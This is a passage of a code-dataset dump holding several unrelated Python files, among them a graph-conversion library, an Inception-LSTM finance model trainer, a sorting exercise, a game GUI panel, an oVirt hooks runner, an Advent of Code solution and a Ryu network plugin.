Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Node][] to add.\n \"\"\"\n self._node_cache_feeder.append(node)\n\n def add_rel_to_cache(self, rel: Relation):\n \"\"\"Add a new [dict2graph.Relation][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will propably only need it of you create [custom Transformers](/diy_transformer).\n\n Args:\n node (Node): The [dict2graph.Relation][] to add.\n \"\"\"\n self._rel_cache_feeder.append(rel)\n\n def _flush_cache(self):\n self._feed_cache_with_new_nodes_and_rels()\n self._run_transformations()\n for node in self._node_cache:\n if not node.deleted:\n self._manifest_node_from_cache(node)\n for rel in self._rel_cache:\n if not rel.deleted:\n self._manifest_rel_from_cache(rel)\n self._node_cache = []\n self._rel_cache = []\n\n def _run_transformations(self):\n for (\n matcher_trans_node_container\n ) in self.matcher_and_node_transformers_stack.containers:\n for node in self._node_cache:\n if (\n matcher_trans_node_container.matcher._match(node)\n and not node.deleted\n ):\n for trans in matcher_trans_node_container.transformers:\n trans._run_custom_node_match_and_transform(node)\n self._feed_cache_with_new_nodes_and_rels()\n\n for (\n matcher_trans_rel_container\n ) in self.matcher_and_rel_transformers_stack.containers:\n for rel in self._rel_cache:\n if matcher_trans_rel_container.matcher._match(rel) and not rel.deleted:\n for trans in matcher_trans_rel_container.transformers:\n trans._run_custom_rel_match_and_transform(rel)\n\n self._feed_cache_with_new_nodes_and_rels()\n\n def _feed_cache_with_new_nodes_and_rels(self):\n self._node_cache.extend(self._node_cache_feeder)\n self._node_cache_feeder = []\n self._rel_cache.extend(self._rel_cache_feeder)\n self._rel_cache_feeder = []\n","repo_name":"DZD-eV-Diabetes-Research/dict2graph","sub_path":"dict2graph/dict2graph.py","file_name":"dict2graph.py","file_ext":"py","file_size_in_byte":27347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12377930869","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[4]:\n\n\n\n### load Data \nimport tensorflow as tf\nimport gzip\nfrom time import time\nfrom tensorflow.python.client import device_lib\nprint(device_lib.list_local_devices())\nimport keras as ks\nimport keras\nimport numpy as np\nimport keras.backend as K\nfrom random import random\nfrom random import randint\nfrom numpy import array\nfrom numpy import zeros\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.layers import LSTM\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.layers import Flatten\nfrom tensorflow.keras.layers import BatchNormalization\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Conv1D\nfrom tensorflow.keras.layers import MaxPooling1D\nfrom tensorflow.keras.layers import AveragePooling1D\nfrom tensorflow.keras.callbacks import LambdaCallback\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.layers import concatenate\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Input\nfrom tensorflow.keras.utils import multi_gpu_model\nimport multiprocessing\n#from eli5.sklearn import PermutationImportance\n#from numba import jit\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.callbacks import ModelCheckpoint\n#from keras.callbacks import TensorBoard\nfrom hyperopt import Trials, STATUS_OK, tpe\nfrom hyperas import optim\nfrom hyperas.distributions import choice\nimport numpy as np\nimport pickle \nimport os\nfrom keras.preprocessing.sequence import TimeseriesGenerator\n\n\n# In[5]:\n\n\n\nimport multiprocessing\n#import dask.dataframe as dk\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\n\n#import matplotlib.pyplot as plt\nidx=pd.IndexSlice\nfrom sklearn.metrics import make_scorer, r2_score,accuracy_score,precision_score\nfrom sklearn.externals import joblib\nimport os\nimport gc\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom tqdm import tqdm\nimport inspect \n\n\n# In[6]:\n\n\n\nmultiprocessing.cpu_count()\n\n\n# In[ ]:\n\n\n\ndef data():\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n Year=readConfigForLoading['Year'][0]\n lookBackYear=readConfigForLoading['lookBackYear'][0]\n LSTMWindow = readConfigForLoading['LSTMWindow'][0]\n NumberOfFeatures = readConfigForLoading['NumberOfFeatures'][0]\n \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(Year) +'lookBackYear' +str(lookBackYear) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n \n #y_train=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtrainHyper5.pkl.npy')\n #X_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempXtestHyper5.pkl.npy')\n #y_test=np.load('/beegfs/sr4376/Finance Data/hyperopt/hyperas/tempOpt/tempYtestHyper5.pkl.npy')\n print(1)\n #, X_test, y_test\n return X_train, y_train\n\n\n# In[ ]:\n\n\ndef create_model(X_train, y_train):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n #,'three','four','five','six','seven'\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers={{choice(['one'])}}\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D={{choice([1,3])}}\n filter3D={{choice([1,3])}}\n filter5D={{choice([1,3])}}\n# pool_size={{choice([ 1,2])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = TimeDistributed(MaxPooling1D(pool_size=pool_size))(layer)\n# else:\n# layer = TimeDistributed(AveragePooling1D(pool_size=pool_size))(layer)\n # 10,20,30,40 \n layer = TimeDistributed(Conv1D(1, kernel_size={{choice([20])}}, activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units={{choice([5,10,20,30,40,60,80,100,120])}}, kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}})(layer)\n if {{choice(['one','two'])}}=='one':\n layer = Dense(units={{choice([5,10,20])}},activation='relu',)(layer)\n layer = Dense(1, activation='linear')(layer)\n#dropout={{choice([0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8])}}\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr={{choice([0.00001,0.0001,0.001,0.01,0.1])}},clipnorm={{choice([0.0001,0.001,0.01,0.1,1])}})\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=1,patience=25)\n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModel.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n callback_List = [es, checkpoint]\n result=model.fit(X_train, y_train, batch_size=6000, epochs=5,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n return {'loss': validation_acc,'status': STATUS_OK,'model':model}\n\n\n# In[ ]:\n\n\ndef continueToTrainModel(params):\n \n def inception_module(layer_in, f1, f2, f3):\n\n conv1 =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n \n conv3 =TimeDistributed( Conv1D(f2, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv3 = TimeDistributed(Conv1D(f2, kernel_size=3, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv3)\n \n conv5 =TimeDistributed( Conv1D(f3, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(layer_in)\n conv5 = TimeDistributed(Conv1D(f3, kernel_size=5, padding='same', activation='relu', kernel_initializer='glorot_normal'))(conv5)\n \n pool = TimeDistributed(AveragePooling1D(pool_size=3, strides=1, padding='same'))(layer_in)\n pool =TimeDistributed( Conv1D(f1, kernel_size=1, padding='same', activation='relu', kernel_initializer='glorot_normal'))(pool)\n layer_out = concatenate([conv1, conv3, conv5, pool], axis=-1)\n return layer_out\n\n \n print(1)\n APPENDweights=[]\n size=377\n #,'two','three','four','five','six','seven'\n clipnormToChoice = [0.0001,0.001,0.01,0.1,1,10]\n deepInceptionLayersToPick = ['one']\n filter1D = [1,3]\n filter1D_1 = [1,3]\n filter1D_2 = [1,3]\n kernel_size = [2]\n learningRateToChoice = [0.00001,0.0001,0.001,0.01,0.1,1]\n# pool_size = [1]\n# pool_stride = [1]\n\n recurrent_dropout = [0,0.1,0.2,0.3,0.4,0.5]\n recurrent_dropout_1 = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8]\n recurrent_dropout_2 =['one','two']\n unitsToChoice = [5, 10, 20, 40, 60, 80, 100, 120]\n units_1 = [5, 10, 20]\n readConfigForLoading=pd.read_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n length = readConfigForLoading['LSTMWindow'][0]\n n_features = readConfigForLoading['NumberOfFeatures'][0]\n def simple_sharpe_loss_function(y_actual,y_predicted):\n M=52\n M=K.cast(M,dtype='float32')\n sharpe_loss_value=K.mean(y_actual*y_predicted)/K.std(y_actual*y_predicted)*K.sqrt(M)\n return sharpe_loss_value\n\n visible = Input(shape=(None,n_features,1))\n layer=visible\n deepInceptionLayers=deepInceptionLayersToPick[params['deepInceptionLayers']]\n if deepInceptionLayers == 'one':\n NumberOfLayers=1\n elif deepInceptionLayers == 'two':\n NumberOfLayers=2\n elif deepInceptionLayers == 'three':\n NumberOfLayers=3\n elif deepInceptionLayers == 'four':\n NumberOfLayers=4\n elif deepInceptionLayers == 'five':\n NumberOfLayers=5\n elif deepInceptionLayers == 'six':\n NumberOfLayers=6\n elif deepInceptionLayers == 'seven':\n NumberOfLayers=7\n \n filter1D=filter1D[params['filter1D']]\n filter3D=filter1D_1[params['filter1D_1']]\n filter5D=filter1D_2[params['filter1D_2']]\n# pool_size={{choice([3,5,9,16,25,34])}}\n #pool_stride={{choice([None,1, 2,3])}}\n momentum= 0.9\n for ii in np.arange(0,NumberOfLayers):\n layer = inception_module(layer, f1=filter1D, f2=filter3D, f3=filter5D)\n layer = TimeDistributed(BatchNormalization(momentum=momentum))(layer)\n# if {{choice(['one','two'])}} == 'one':\n# layer = MaxPooling1D(pool_size=pool_size)(layer)\n# else:\n# layer = AveragePooling1D(pool_size=pool_size)(layer)\n \n layer = TimeDistributed(Conv1D(1, kernel_size=kernel_size[params['kernel_size']], activation='relu', kernel_initializer='glorot_normal'))(layer)\n layer = TimeDistributed(Flatten())(layer)\n layer= LSTM(units=unitsToChoice[params['units']], kernel_initializer='glorot_normal',bias_initializer='glorot_normal',recurrent_dropout=recurrent_dropout_1[params['recurrent_dropout']])(layer)\n if recurrent_dropout_2[params['recurrent_dropout_1']] =='one':\n layer = Dense(units=units_1[params['units_1']],activation='relu')(layer)\n layer = Dense(1, activation='linear')(layer)\n\n model = Model(inputs=visible,outputs=layer) \n opt=Adam(lr=learningRateToChoice[params['lr']],clipnorm=clipnormToChoice[params['clipnorm']])\n model.compile(loss=simple_sharpe_loss_function, optimizer=opt)\n model.summary()\n\n return model\n\n\n# In[ ]:\n\n\n\nmodelName='InceptionLSTM'\ngc.collect()\npredictionPeriod=1\nLSTMWindow=21\nyearsBack=np.arange(1,2)\nNumberOfFeatures=100\nepochs=5\nbatch_size=4000\nfor jj in yearsBack:\n years=np.arange(2008,2015)\n best_model = None\n for ii in years:\n print(years)\n lowYear=ii-jj\n config=pd.DataFrame([[ii, jj ,LSTMWindow, NumberOfFeatures]],columns=['Year','lookBackYear','LSTMWindow','NumberOfFeatures'])\n config.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/modelConfigInceptionLSTM100.csv')\n if best_model is None:\n best_run, best_model = optim.minimize(model=create_model,\n data=data,\n algo=tpe.suggest,\n max_evals=2,\n trials=Trials())\n print('best model over the optmization')\n print(best_run)\n model=best_model\n \n else:\n model=continueToTrainModel(best_run)\n es=EarlyStopping(monitor='val_loss',mode='min',verbose=2,patience=25) \n checkpoint = ModelCheckpoint('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/BestModelInceptionLSTM.hdf5', monitor='val_loss', verbose=1, save_best_only=True, mode='min',period=10) \n# tensorboard = TensorBoard(log_dir=r\"D:\\ML for Finance\\data\\logs\\{}\".format(time()),histogram_freq=10,write_graph=True,write_images=True,update_freq=\"epoch\")\n #tensorboard\n callback_List = [es, checkpoint] \n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n X_train=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii) +'lookBackYear' +str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n y_train=pickle.load( handle)\n\n result=model.fit(X_train, y_train, batch_size=batch_size, epochs=epochs,callbacks = callback_List, validation_split=0.1,verbose=2)\n validation_acc = np.amin(result.history['val_loss'])\n print('Best validation acc of epoch:', -validation_acc)\n\n \n \n model_json = model.to_json()\n with open('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'Model' + str(ii) + 'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.json',\"w\") as json_file:\n json_file.write(model_json)\n \n best_model.save_weights('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/ ' + modelName +'ModelWeights' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.h5')\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNFeatureYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationData=pickle.load( handle)\n \n with gzip.open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/CNNTargetYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.pklz', 'rb') as handle:\n ValidationTarget=pickle.load( handle)\n \n with open ('/beegfs/sr4376/Finance Data/LSTM/yearsBack/indexObjectYear' + str(ii+1) +'lookBackYear' +str(1) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv', 'rb') as handle:\n validationIndex=pd.read_csv( handle,parse_dates=['1']) \n# \n validationIndex.rename(columns={'0':'entityID', '1':'date'},inplace=True) \n validationIndex.set_index(['entityID','date'],inplace=True,drop=False)\n validationIndex.drop(columns='Unnamed: 0',inplace=True)\n\n \n \n pred1=best_model.predict(ValidationData, batch_size=2000)\n print(2)\n pred1=pd.DataFrame(pred1)\n pred1['targets']=ValidationTarget\n pred1['entityID']=validationIndex['entityID'].values\n pred1['date']=validationIndex['date'].values\n pred1.set_index(['entityID','date'],inplace=True)\n pred1.to_csv('/beegfs/sr4376/Finance Data/LSTMResults/yearsBack/data' + modelName +'Prediction' + str(ii) +'yearsBackHyperopt' + str(jj) + 'LSTMWindow' + str(LSTMWindow) + 'NumberOfFeatures' + str(NumberOfFeatures) + '.csv')\n\n","repo_name":"SteffenRoe/4376-DL-Project","sub_path":"InceptionLSTMFor100.py","file_name":"InceptionLSTMFor100.py","file_ext":"py","file_size_in_byte":16915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"37306967782","text":"\"\"\"\nLogger is a class to manage log output and format so that we\ndon't have to pass loggers into methods or classes in order\nto get the desired results.\n\"\"\"\n\nimport logging\n\nclass Logger(object):\n \"\"\"\n Logger class that is a little messy and requires you to run\n configure() before using any of the other methods. Not in love\n with this setup but it allow me to not pepper logging throughout\n the application and have to pass it down 3 levels to get it to the\n proper class.\n \"\"\"\n logger = \"\"\n\n @classmethod\n def configure(cls):\n \"\"\"\n Create configuration for logger and change\n the default format that it uses.\n \"\"\"\n logger = logging.getLogger()\n logger.setLevel(logging.INFO)\n logger_handler = logging.StreamHandler()\n logger.addHandler(logger_handler)\n logger_handler.setFormatter(logging.Formatter('%(message)s'))\n cls.logger = logger\n\n @classmethod\n def info(cls, string, *opts):\n \"\"\"\n Print info out to screen\n \"\"\"\n cls.logger.info(string, *opts)\n","repo_name":"michaeljs1990/compress","sub_path":"compress/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"}
+{"seq_id":"32387641043","text":"def maxPro(arr): # 최댓값 구하는 함수\n maxV = arr[0]\n for a in arr:\n if maxV < a:\n maxV = a\n return maxV\n\ndef toString(string): # 숫자 리스트를 문자열로 바꾸는 함수\n res = ''\n for s in string:\n res += str(s) + ' '\n return res\n\nT = int(input()) #test case 개수\n\nfor tc in range(1, T+1):\n N = int(input())\n nums = list(map(int, input().split()))\n cnt = [0] * int(maxPro(nums) + 1) # (nums의 최대 숫자 +1)개를 갖는 배열\n temp = [0] * N # 새로 정리된 숫자를 받을 배열\n\n for num in nums:\n cnt[num] += 1 # nums의 수를 확인하고, 그 수로 인덱스를 갖는 곳에 1 추가\n # print(cnt)\n for i in range(1, len(cnt)): # 누적합\n cnt[i] = cnt[i-1] + cnt[i]\n # print(cnt)\n # print(len(nums)-1)\n # print('----------------')\n for i in range(len(nums)-1, -1, -1): # i = 배열의 끝 인덱스부터 하나씩 내려올거야\n cnt[nums[i]] -= 1 # nums[i]번째 값을 인덱스로 갖는 cnt의 값을 하나 줄여준다.\n # print(cnt)\n # print(nums[i])\n temp[cnt[nums[i]]] = nums[i] # 하나 줄인값을 인덱스로 갖�� temp값에 nums[i]넣는다.\n\n print(f'#{tc} {toString(temp)}')","repo_name":"better-gyeom/Python_Algorithm","sub_path":"SWEA/D2/1966. 숫자를 정렬하자/숫자를 정렬하자.py","file_name":"숫자를 정렬하자.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"40713871693","text":"from direct.gui.DirectGui import *\nfrom pandac.PandaModules import *\nfrom direct.directnotify import DirectNotifyGlobal\nfrom otp.otpbase import OTPGlobals\nfrom pirates.piratesgui import PDialog\nfrom pirates.piratesgui import GuiPanel\nfrom pirates.piratesgui import PiratesGuiGlobals\nfrom pirates.piratesbase import PiratesGlobals\nfrom pirates.piratesbase import PLocalizer\nfrom pirates.band import BandConstance\nfrom pirates.piratesgui.RequestButton import RequestButton\n\nclass CrewInviteeButton(RequestButton):\n \n def __init__(self, text, command):\n RequestButton.__init__(self, text, command)\n self.initialiseoptions(CrewInviteeButton)\n\n\n\nclass CrewInvitee(GuiPanel.GuiPanel):\n notify = DirectNotifyGlobal.directNotify.newCategory('CrewInvitee')\n \n def __init__(self, avId, avName):\n GuiPanel.GuiPanel.__init__(self, 'Crew Invitation', 0.5, 0.5, showClose = False)\n self.initialiseoptions(CrewInvitee)\n self.setPos(0.15, 0, 0.25)\n self.avId = avId\n self.avName = avName\n if base.cr.avatarFriendsManager.checkIgnored(self.avId):\n self.__handleNo()\n return\n \n text = PLocalizer.CrewInviteeInvitation % self.avName\n self.message = DirectLabel(parent = self, relief = None, text = text, text_scale = PiratesGuiGlobals.TextScaleLarge, text_align = TextNode.ACenter, text_fg = PiratesGuiGlobals.TextFG2, text_shadow = PiratesGuiGlobals.TextShadow, text_wordwrap = 11, pos = (0.25, 0, 0.35), textMayChange = 1)\n self.bOk = CrewInviteeButton(text = PLocalizer.CrewInviteeOK, command = self.__handleOk)\n self.bOk.reparentTo(self)\n self.bOk.setPos(0.1, 0, 0.05)\n self.bNo = CrewInviteeButton(text = PLocalizer.CrewInviteeNo, command = self.__handleNo)\n self.bNo.reparentTo(self)\n self.bNo.setPos(0.3, 0, 0.05)\n self.accept('BandRequestCancel-%s' % (self.avId,), self.__handleCancelFromAbove)\n \n def destroy(self):\n if hasattr(self, 'destroyed'):\n return\n \n self.destroyed = 1\n self.ignore('BandRequestCancel-%s' % (self.avId,))\n self.ignore('Esc')\n GuiPanel.GuiPanel.destroy(self)\n \n def __handleOk(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_ok)\n self.destroy()\n\n def __handleNo(self):\n base.cr.PirateBandManager.d_invitationResponce(self.avId, BandConstance.outcome_declined)\n self.destroy()\n \n def __handleCancelFromAbove(self):\n self.destroy()\n\n\n","repo_name":"PiratesOnlineClassic/pirates-online-classic","sub_path":"pirates/piratesgui/CrewInvitee.py","file_name":"CrewInvitee.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"}
+{"seq_id":"3213324052","text":"import logging\nimport os\n\nfrom ovirt.node import base\nfrom ovirt.node.utils import process\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Hooks(base.Base):\n \"\"\"A utility class which executes files for additional configuration\n beyond the normal install\n \"\"\"\n\n known = [\"pre-upgrade\", \"post-upgrade\", \"rollback\", \"on-boot\",\n \"on-changed-boot-image\"]\n\n legacy_hooks_directory = \"/etc/ovirt-config-boot.d/\"\n hooks_path_tpl = \"/usr/libexec/ovirt-node/hooks/{name}\"\n\n @staticmethod\n def post_auto_install():\n Hooks.__run(Hooks.legacy_hooks_directory)\n\n @staticmethod\n def emit(name):\n \"\"\"Signal that a specific event appeared, and trigger the hook handlers\n\n Args:\n name: Name of the hook (bust be in Hooks.known)\n \"\"\"\n assert name in Hooks.known\n path = Hooks.hooks_path_tpl.format(name=name)\n Hooks.__run(path)\n\n @staticmethod\n def __run(hooks_directory):\n for hook in os.listdir(hooks_directory):\n script = os.path.join(hooks_directory, hook)\n\n if script.endswith(\".pyc\") or script.endswith(\".pyo\"):\n continue\n\n LOGGER.debug(\"Running hook %s\" % script)\n if script.endswith(\".py\"):\n output = process.check_output([\"python\", script])\n else:\n output = process.check_output(\"%s &> /dev/null\" % script,\n shell=True)\n\n [LOGGER.debug(\"%s: %s\" % (script, line)) for line in output]\n","repo_name":"oVirt/ovirt-node","sub_path":"src/ovirt/node/utils/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"}
+{"seq_id":"35335162899","text":"# https://adventofcode.com/2017/day/3\n\nfrom collections import defaultdict\nfrom itertools import count\n\ndef spiral(Δ = 1j):\n i = 1; yield 1, 0 # i, pos\n for side_len in count(3, step=2):\n pos = (1 - 1j) * (side_len//2)\n for _ in range(4):\n for _ in range(side_len-1):\n i += 1; pos += Δ\n yield i, pos\n Δ *= 1j\n\ndef fst_star(stop):\n abs_int = lambda x: abs(int(x))\n for x, pos in spiral():\n if x == stop: \n return sum(map(abs_int, [pos.real, pos.imag]))\n\ndef snd_star(stop):\n grid = defaultdict(int, {0: 1})\n for i, pos in spiral():\n if i == 1: continue\n grid[pos] = sum( \n grid[pos + Δ] \n for Δ in [\n -1+1j, 1j, 1+1j, \n -1 , 1, \n -1-1j, -1j, 1-1j, \n ]\n )\n if grid[pos] > stop: return grid[pos]\n\nif __name__ == '__main__':\n assert fst_star(1) == 0\n assert fst_star(12) == 3\n assert fst_star(23) == 2\n assert fst_star(1024) == 31\n\n print(fst_star(265149))\n print(snd_star(265149))\n\n","repo_name":"andy1li/adventofcode","sub_path":"2017/day03_spiral.py","file_name":"day03_spiral.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"21972020219","text":"from ryu.app import client\nfrom ryu.app.client import ignore_http_not_found\nfrom ryu.app import rest_nw_id\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import exc as orm_exc\n\nfrom quantum.common import constants as q_const\nfrom quantum.common import exceptions as q_exc\nfrom quantum.common import topics\nfrom quantum.db import api as db\nfrom quantum.db import db_base_plugin_v2\nfrom quantum.db.dhcp_rpc_base import DhcpRpcCallbackMixin\nfrom quantum.db import l3_db\nfrom quantum.db import models_v2\nfrom quantum.openstack.common import cfg\nfrom quantum.openstack.common import log as logging\nfrom quantum.openstack.common import rpc\nfrom quantum.openstack.common.rpc import dispatcher\nfrom quantum.plugins.ryu.common import config\nfrom quantum.plugins.ryu.db import api_v2 as db_api_v2\nfrom quantum.plugins.ryu import ofp_service_type\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass RyuQuantumPluginV2(db_base_plugin_v2.QuantumDbPluginV2,\n l3_db.L3_NAT_db_mixin):\n\n supported_extension_aliases = [\"router\"]\n\n def __init__(self, configfile=None):\n options = {\"sql_connection\": cfg.CONF.DATABASE.sql_connection}\n options.update({'base': models_v2.model_base.BASEV2})\n reconnect_interval = cfg.CONF.DATABASE.reconnect_interval\n options.update({\"reconnect_interval\": reconnect_interval})\n db.configure_db(options)\n\n self.tunnel_key = db_api_v2.TunnelKey(\n cfg.CONF.OVS.tunnel_key_min, cfg.CONF.OVS.tunnel_key_max)\n ofp_con_host = cfg.CONF.OVS.openflow_controller\n ofp_api_host = cfg.CONF.OVS.openflow_rest_api\n\n if ofp_con_host is None or ofp_api_host is None:\n raise q_exc.Invalid(_('invalid configuration. check ryu.ini'))\n\n hosts = [(ofp_con_host, ofp_service_type.CONTROLLER),\n (ofp_api_host, ofp_service_type.REST_API)]\n db_api_v2.set_ofp_servers(hosts)\n\n self.client = client.OFPClient(ofp_api_host)\n self.tun_client = client.TunnelClient(ofp_api_host)\n for nw_id in rest_nw_id.RESERVED_NETWORK_IDS:\n if nw_id != rest_nw_id.NW_ID_UNKNOWN:\n self.client.update_network(nw_id)\n self._setup_rpc()\n\n # register known all network list on startup\n self._create_all_tenant_network()\n\n def _setup_rpc(self):\n self.conn = rpc.create_connection(new=True)\n self.callback = DhcpRpcCallbackMixin()\n self.dispatcher = dispatcher.RpcDispatcher([self.callback])\n self.conn.create_consumer(topics.PLUGIN, self.dispatcher, fanout=False)\n self.conn.consume_in_thread()\n\n def _create_all_tenant_network(self):\n for net in db_api_v2.network_all_tenant_list():\n self.client.update_network(net.id)\n for tun in self.tunnel_key.all_list():\n self.tun_client.update_tunnel_key(tun.network_id, tun.tunnel_key)\n session = db.get_session()\n for port_binding in db_api_v2.port_binding_all_list(session):\n network_id = port_binding.network_id\n dpid = port_binding.dpid\n port_no = port_binding.port_no\n try:\n port = session.query(models_v2.Port).filter(\n models_v2.Port.id == port_binding.port_id).one()\n except orm_exc.NoResultFound:\n continue\n except orm_exc.MultipleResultsFound:\n continue\n\n self.client.update_port(network_id, dpid, port_no)\n self.client.update_mac(network_id, dpid, port_no, port.mac_address)\n\n def _client_create_network(self, 